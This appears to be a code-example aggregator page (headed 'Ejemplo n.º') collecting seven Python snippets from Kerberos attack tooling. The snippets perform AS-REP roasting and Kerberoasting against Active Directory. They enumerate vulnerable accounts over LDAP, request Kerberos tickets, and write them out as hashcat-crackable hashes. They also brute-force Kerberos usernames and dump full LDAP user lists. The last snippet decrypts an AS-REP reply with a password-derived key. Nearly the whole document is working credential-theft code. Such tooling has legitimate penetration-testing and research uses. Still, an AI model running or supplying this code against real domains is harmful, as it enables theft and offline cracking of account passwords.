Ejemplo n.º 1
0
async def asreproast(host, targets, out_file=None, etype=23):
    """
	targets List<KerberosSPN>

	"""
    try:
        logger.debug('[KERBEROS][ASREPROAST] Roasting...')
        logger.debug(
            '[KERBEROS][ASREPROAST] Supporting the following encryption type: %s'
            % (str(etype)))

        ks = KerberosTarget(host)
        ar = APREPRoast(ks)
        hashes = []
        for target in targets:
            h = await ar.run(target, override_etype=[etype])
            hashes.append(h)

            if out_file:
                with open(out_file, 'a', newline='') as f:
                    for thash in hashes:
                        f.write(thash + '\r\n')
            else:
                print(h)

        logger.info('[KERBEROS][ASREPROAST] Done!')
        return hashes, None

    except Exception as e:
        return None, e
Ejemplo n.º 2
0
    async def asreproast(self):
        try:
            target = None
            if self.kerb_url == 'auto':
                from winacl.functions.highlevel import get_logon_info
                logon = get_logon_info()
                if logon['logonserver'] == '':
                    logger.debug(
                        'Failed to detect logonserver! asreproast will not work automagically!'
                    )
                    return True, None

                target = KerberosTarget()
                target.ip = '%s.%s' % (logon['logonserver'],
                                       logon['dnsdomainname'])

            else:
                target = self.kerb_mgr.get_target()

            for uid in self.targets_asreq:
                ar = APREPRoast(target)
                res = await ar.run(self.targets_asreq[uid],
                                   override_etype=[23])
                t = KerberoastTable.from_hash(self.ad_id, uid, res)
                self.db_session.add(t)
                self.total_targets_finished += 1

                if self.progress_queue is not None:
                    msg = GathererProgress()
                    msg.type = GathererProgressType.KERBEROAST
                    msg.msg_type = MSGTYPE.PROGRESS
                    msg.adid = self.ad_id
                    msg.domain_name = self.domain_name
                    msg.total = self.total_targets
                    msg.total_finished = self.total_targets_finished
                    msg.step_size = 1
                    await self.progress_queue.put(msg)

            self.db_session.commit()
            return True, None
        except Exception as e:
            return None, e
Ejemplo n.º 3
0
async def live_roast(outfile=None):
    try:
        logon = get_logon_info()
        domain = logon['domain']
        url = 'ldap+sspi-ntlm://%s' % logon['logonserver']
        msldap_url = MSLDAPURLDecoder(url)
        client = msldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')
        spn_users = []
        asrep_users = []
        errors = []
        results = []
        final_results = []
        spn_cnt = 0
        asrep_cnt = 0
        async for user, err in client.get_all_knoreq_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            asrep_users.append(cred)
        async for user, err in client.get_all_service_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            spn_users.append(cred)

        for cred in asrep_users:
            results = []
            ks = KerberosTarget(domain)
            ar = APREPRoast(ks)
            res = await ar.run(cred, override_etype=[23])
            results.append(res)

        if outfile is not None:
            filename = outfile + 'asreproast_%s_%s.txt' % (
                logon['domain'],
                datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
            with open(filename, 'w', newline='') as f:
                for thash in results:
                    asrep_cnt += 1
                    f.write(thash + '\r\n')
        else:
            final_results += results

        results = []
        for cred in spn_users:
            spn_name = '%s@%s' % (cred.username, cred.domain)
            if spn_name[:6] == 'krbtgt':
                continue
            try:
                ctx = AcquireCredentialsHandle(None, 'kerberos', spn_name,
                                               SECPKG_CRED.OUTBOUND)
                res, ctx, data, outputflags, expiry = InitializeSecurityContext(
                    ctx,
                    spn_name,
                    token=None,
                    ctx=ctx,
                    flags=ISC_REQ.ALLOCATE_MEMORY | ISC_REQ.CONNECTION)
                if res == SEC_E.OK or res == SEC_E.CONTINUE_NEEDED:
                    ticket = InitialContextToken.load(
                        data[0][1]).native['innerContextToken']
                else:
                    raise Exception('Error %s' % res.value)
            except Exception as e:
                print(e)
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        if outfile is not None:
            filename = outfile + 'spnroast_%s_%s.txt' % (
                logon['domain'],
                datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
            with open(filename, 'w', newline='') as f:
                for thash in results:
                    spn_cnt += 1
                    f.write(thash + '\r\n')

        else:
            final_results += results

        return final_results, errors, None

    except Exception as e:
        return None, None, e
Ejemplo n.º 4
0
async def amain(args):
    if args.command == 'tgs':
        logging.debug('[TGS] started')
        ku = KerberosClientURL.from_url(args.kerberos_connection_url)
        cred = ku.get_creds()
        target = ku.get_target()
        spn = KerberosSPN.from_user_email(args.spn)

        logging.debug('[TGS] target user: %s' % spn.get_formatted_pname())
        logging.debug('[TGS] fetching TGT')
        kcomm = AIOKerberosClient(cred, target)
        await kcomm.get_TGT()
        logging.debug('[TGS] fetching TGS')
        await kcomm.get_TGS(spn)

        kcomm.ccache.to_file(args.out_file)
        logging.debug('[TGS] done!')

    elif args.command == 'tgt':
        logging.debug('[TGT] started')
        ku = KerberosClientURL.from_url(args.kerberos_connection_url)
        cred = ku.get_creds()
        target = ku.get_target()

        logging.debug('[TGT] cred: %s' % cred)
        logging.debug('[TGT] target: %s' % target)

        kcomm = AIOKerberosClient(cred, target)
        logging.debug('[TGT] fetching TGT')
        await kcomm.get_TGT()

        kcomm.ccache.to_file(args.out_file)
        logging.debug('[TGT] Done! TGT stored in CCACHE file')

    elif args.command == 'asreproast':
        if not args.targets and not args.user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')
        creds = []
        targets = get_targets_from_file(args, False)
        targets += get_target_from_args(args, False)
        if len(targets) == 0:
            raise Exception(
                'No targets were specified! Either use target file or specify target via cmdline'
            )

        logging.debug('[ASREPRoast] loaded %d targets' % len(targets))
        logging.debug(
            '[ASREPRoast] will suppoort the following encryption type: %s' %
            (str(args.etype)))

        ks = KerberosTarget(args.address)
        ar = APREPRoast(ks)
        hashes = []
        for target in targets:
            h = await ar.run(target, override_etype=[args.etype])
            hashes.append(h)

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in hashes:
                    f.write(thash + '\r\n')

        else:
            for thash in hashes:
                print(thash)

        logging.info('ASREPRoast complete')

    elif args.command == 'spnroast':
        if not args.targets and not args.user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')

        targets = get_targets_from_file(args)
        targets += get_target_from_args(args)
        if len(targets) == 0:
            raise Exception(
                'No targets were specified! Either use target file or specify target via cmdline'
            )

        logging.debug('Kerberoast loaded %d targets' % len(targets))

        if args.etype:
            if args.etype == -1:
                etypes = [23, 17, 18]
            else:
                etypes = [args.etype]
        else:
            etypes = [23, 17, 18]

        logging.debug(
            'Kerberoast will suppoort the following encryption type(s): %s' %
            (','.join(str(x) for x in etypes)))

        ku = KerberosClientURL.from_url(args.kerberos_connection_url)
        cred = ku.get_creds()
        target = ku.get_target()
        ar = Kerberoast(target, cred)
        hashes = await ar.run(targets, override_etype=etypes)

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in hashes:
                    f.write(thash + '\r\n')

        else:
            for thash in hashes:
                print(thash)

        logging.info('Kerberoast complete')

    elif args.command == 'brute':
        target = KerberosTarget(args.address)

        with open(args.targets, 'r') as f:
            for line in f:
                line = line.strip()
                spn = KerberosSPN()
                spn.username = line
                spn.domain = args.realm

                ke = KerberosUserEnum(target, spn)

                result = await ke.run()
                if result is True:
                    if args.out_file:
                        with open(args.out_file, 'a') as f:
                            f.write(result + '\r\n')
                    else:
                        print('[+] Enumerated user: %s' % str(spn))

        logging.info('Kerberos user enumeration complete')

    elif args.command == 'spnroast-sspi':
        if platform.system() != 'Windows':
            print('[-]This command only works on Windows!')
            return
        try:
            from winsspi.sspi import KerberoastSSPI
        except ImportError:
            raise Exception('winsspi module not installed!')

        if not args.targets and not args.user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')

        targets = get_targets_from_file(args)
        targets += get_target_from_args(args)
        if len(targets) == 0:
            raise Exception(
                'No targets were specified! Either use target file or specify target via cmdline'
            )

        results = []
        errors = []
        for spn_name in targets:
            ksspi = KerberoastSSPI()
            try:
                ticket = ksspi.get_ticket_for_spn(
                    spn_name.get_formatted_pname())
            except Exception as e:
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in results:
                    f.write(thash + '\r\n')

        else:
            for thash in results:
                print(thash)

        for err in errors:
            print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

        logging.info('SSPI based Kerberoast complete')

    elif args.command == 'spnroast-multiplexor':
        #hiding the import so it's not necessary to install multiplexor
        await spnmultiplexor(args)

    elif args.command == 'auto':
        if platform.system() != 'Windows':
            print('[-]This command only works on Windows!')
            return
        try:
            from winsspi.sspi import KerberoastSSPI
        except ImportError:
            raise Exception('winsspi module not installed!')

        domain = args.dc_ip
        url = 'ldap+sspi-ntlm://%s' % domain
        msldap_url = MSLDAPURLDecoder(url)
        client = msldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')
        spn_users = []
        asrep_users = []
        results = []
        errors = []
        async for user, err in client.get_all_knoreq_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            asrep_users.append(cred)
        async for user, err in client.get_all_service_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            spn_users.append(cred)

        for cred in asrep_users:
            ks = KerberosTarget(domain)
            ar = APREPRoast(ks)
            res = await ar.run(cred, override_etype=[args.etype])
            results.append(res)

        for cred in spn_users:
            spn_name = '%s@%s' % (cred.username, cred.domain)
            if spn_name[:6] == 'krbtgt':
                continue
            ksspi = KerberoastSSPI()
            try:
                ticket = ksspi.get_ticket_for_spn(spn_name)
            except Exception as e:
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in results:
                    f.write(thash + '\r\n')
        else:
            for thash in results:
                print(thash)

        for err in errors:
            print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

    elif args.command == 'ldap':
        ldap_url = MSLDAPURLDecoder(args.ldap_url)
        client = ldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')

        if args.out_file:
            basefolder = ntpath.dirname(args.out_file)
            basefile = ntpath.basename(args.out_file)

        if args.type in ['spn', 'all']:
            logging.debug('Enumerating SPN user accounts...')
            cnt = 0
            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_spn_users.txt'),
                          'w',
                          newline='') as f:
                    async for user in client.get_all_service_users():
                        cnt += 1
                        f.write('%s@%s\r\n' % (user.sAMAccountName, domain))

            else:
                print('[+] SPN users')
                async for user, err in client.get_all_service_users():
                    if err is not None:
                        raise err
                    cnt += 1
                    print('%s@%s' % (user.sAMAccountName, domain))

            logging.debug('Enumerated %d SPN user accounts' % cnt)

        if args.type in ['asrep', 'all']:
            logging.debug('Enumerating ASREP user accounts...')
            ctr = 0
            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_asrep_users.txt'),
                          'w',
                          newline='') as f:
                    async for user, err in client.get_all_knoreq_users():
                        if err is not None:
                            raise err
                        ctr += 1
                        f.write('%s@%s\r\n' % (user.sAMAccountName, domain))
            else:
                print('[+] ASREP users')
                async for user, err in client.get_all_knoreq_users():
                    if err is not None:
                        raise err
                    ctr += 1
                    print('%s@%s' % (user.sAMAccountName, domain))

            logging.debug('Enumerated %d ASREP user accounts' % ctr)

        if args.type in ['full', 'all']:
            logging.debug(
                'Enumerating ALL user accounts, this will take some time depending on the size of the domain'
            )
            ctr = 0
            attrs = args.attrs if args.attrs is not None else MSADUser_TSV_ATTRS
            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_ldap_users.tsv'),
                          'w',
                          newline='',
                          encoding='utf8') as f:
                    writer = csv.writer(f, delimiter='\t')
                    writer.writerow(attrs)
                    async for user, err in client.get_all_users():
                        if err is not None:
                            raise err
                        ctr += 1
                        writer.writerow(user.get_row(attrs))

            else:
                logging.debug('Are you sure about this?')
                print('[+] Full user dump')
                print('\t'.join(attrs))
                async for user, err in client.get_all_users():
                    if err is not None:
                        raise err
                    ctr += 1
                    print('\t'.join([str(x) for x in user.get_row(attrs)]))

            logging.debug('Enumerated %d user accounts' % ctr)

        if args.type in ['custom']:
            if not args.filter:
                raise Exception(
                    'Custom LDAP search requires the search filter to be specified!'
                )
            if not args.attrs:
                raise Exception(
                    'Custom LDAP search requires the attributes to be specified!'
                )

            logging.debug(
                'Perforing search on the AD with the following filter: %s' %
                args.filter)
            logging.debug('Search will contain the following attributes: %s' %
                          ','.join(args.attrs))
            ctr = 0

            if args.out_file:
                with open(os.path.join(basefolder,
                                       basefile + '_ldap_custom.tsv'),
                          'w',
                          newline='') as f:
                    writer = csv.writer(f, delimiter='\t')
                    writer.writerow(args.attrs)
                    async for obj, err in client.pagedsearch(
                            args.filter, args.attrs):
                        if err is not None:
                            raise err
                        ctr += 1
                        writer.writerow([
                            str(obj['attributes'].get(x, 'N/A'))
                            for x in args.attrs
                        ])

            else:
                async for obj, err in client.pagedsearch(
                        args.filter, args.attrs):
                    if err is not None:
                        raise err
                    ctr += 1
                    print('\t'.join([
                        str(obj['attributes'].get(x, 'N/A'))
                        for x in args.attrs
                    ]))
Ejemplo n.º 5
0
async def run_auto():
    try:
        if platform.system() != 'Windows':
            print('[-]This command only works on Windows!')
            return
        try:
            from winsspi.sspi import KerberoastSSPI
        except ImportError:
            raise Exception('winsspi module not installed!')

        from winacl.functions.highlevel import get_logon_info

        logon = get_logon_info()
        domain = logon['domain']
        url = 'ldap+sspi-ntlm://%s' % logon['logonserver']
        msldap_url = MSLDAPURLDecoder(url)
        client = msldap_url.get_client()
        _, err = await client.connect()
        if err is not None:
            raise err

        domain = client._ldapinfo.distinguishedName.replace('DC=', '').replace(
            ',', '.')
        spn_users = []
        asrep_users = []
        errors = []
        spn_cnt = 0
        asrep_cnt = 0
        async for user, err in client.get_all_knoreq_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            asrep_users.append(cred)
        async for user, err in client.get_all_service_users():
            if err is not None:
                raise err
            cred = KerberosCredential()
            cred.username = user.sAMAccountName
            cred.domain = domain

            spn_users.append(cred)

        for cred in asrep_users:
            results = []
            ks = KerberosTarget(domain)
            ar = APREPRoast(ks)
            res = await ar.run(cred, override_etype=[23])
            results.append(res)

        filename = 'asreproast_%s_%s.txt' % (
            logon['domain'],
            datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
        with open(filename, 'w', newline='') as f:
            for thash in results:
                asrep_cnt += 1
                f.write(thash + '\r\n')

        results = []
        for cred in spn_users:
            spn_name = '%s@%s' % (cred.username, cred.domain)
            if spn_name[:6] == 'krbtgt':
                continue
            ksspi = KerberoastSSPI()
            try:
                ticket = ksspi.get_ticket_for_spn(spn_name)
            except Exception as e:
                errors.append((spn_name, e))
                continue
            results.append(TGSTicket2hashcat(ticket))

        filename = 'spnroast_%s_%s.txt' % (
            logon['domain'],
            datetime.datetime.utcnow().strftime("%Y%m%d_%H%M%S"))
        with open(filename, 'w', newline='') as f:
            for thash in results:
                spn_cnt += 1
                f.write(thash + '\r\n')

        for err in errors:
            print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

        print('[+] Done! %s spnroast tickets %s asreproast tickets' %
              (spn_cnt, asrep_cnt))
    except Exception as e:
        print(e)
Ejemplo n.º 6
0
    def run_live(self, args):
        from winsspi.sspi import KerberoastSSPI
        from minikerberos.security import TGSTicket2hashcat, APREPRoast
        from minikerberos.utils import TGTTicket2hashcat
        from minikerberos.communication import KerberosSocket
        from minikerberos.common import KerberosTarget
        from pypykatz.commons.winapi.machine import LiveMachine

        if not args.target_file and not args.target_user:
            raise Exception(
                'No targets loaded! Either -u or -t MUST be specified!')

        machine = LiveMachine()

        realm = args.realm
        if not args.realm:
            realm = machine.get_domain()

        if args.cmd in ['spnroast', 'asreproast']:
            targets = []
            if args.target_file:
                with open(args.target_file, 'r') as f:
                    for line in f:
                        line = line.strip()
                        domain = None
                        username = None
                        if line.find('/') != -1:
                            #we take for granted that usernames do not have the char / in them!
                            domain, username = line.split('/')
                        else:
                            username = line

                        if args.realm:
                            domain = args.realm
                        else:
                            if domain is None:
                                raise Exception(
                                    'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
                                )

                        target = KerberosTarget()
                        target.username = username
                        target.domain = domain
                        targets.append(target)

            if args.target_user:
                for user in args.target_user:
                    domain = None
                    username = None
                    if user.find('/') != -1:
                        #we take for granted that usernames do not have the char / in them!
                        domain, username = user.split('/')
                    else:
                        username = user

                    if args.realm:
                        domain = args.realm
                    else:
                        if domain is None:
                            raise Exception(
                                'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
                            )
                    target = KerberosTarget()
                    target.username = username
                    target.domain = domain
                    targets.append(target)

            results = []
            errors = []
            if args.cmd == 'spnroast':
                for spn_name in targets:
                    ksspi = KerberoastSSPI()
                    try:
                        ticket = ksspi.get_ticket_for_spn(
                            spn_name.get_formatted_pname())
                    except Exception as e:
                        errors.append((spn_name, e))
                        continue
                    results.append(TGSTicket2hashcat(ticket))

            elif args.cmd == 'asreproast':
                dcip = args.dc_ip
                if args.dc_ip is None:
                    dcip = machine.get_domain()
                ks = KerberosSocket(dcip)
                ar = APREPRoast(ks)
                results = ar.run(targets)

            if args.out_file:
                with open(args.out_file, 'w') as f:
                    for thash in results:
                        f.write(thash + '\r\n')

            else:
                for thash in results:
                    print(thash)

            for err in errors:
                print('Failed to get ticket for %s. Reason: %s' %
                      (err[0], err[1]))

            logging.info('SSPI based Kerberoast complete')
Ejemplo n.º 7
0
from minikerberos.asn1_structs import EncASRepPart
import hashlib

ccred = KerberosCredential()
ccred.username = '******'
ccred.domain = 'TEST.corp'

ccred2 = KerberosCredential()
ccred2.username = '******'
ccred2.domain = 'TEST.corp'

creds = [ccred, ccred2]

ks = KerberosSocket('192.168.9.1')

ar = APREPRoast(ks)
res = ar.run(creds)

rep = res[0]
print(res)

x, a, enctype, checksum, data = rep.split('$')

password = '******'
cipher = _enctype_table[int(enctype)]
key = Key(int(enctype),
          hashlib.new('md4', password.encode('utf-16-le')).digest())
cipherText = bytes.fromhex(checksum + data)
temp = cipher.decrypt(key, 3, cipherText)
print()
print()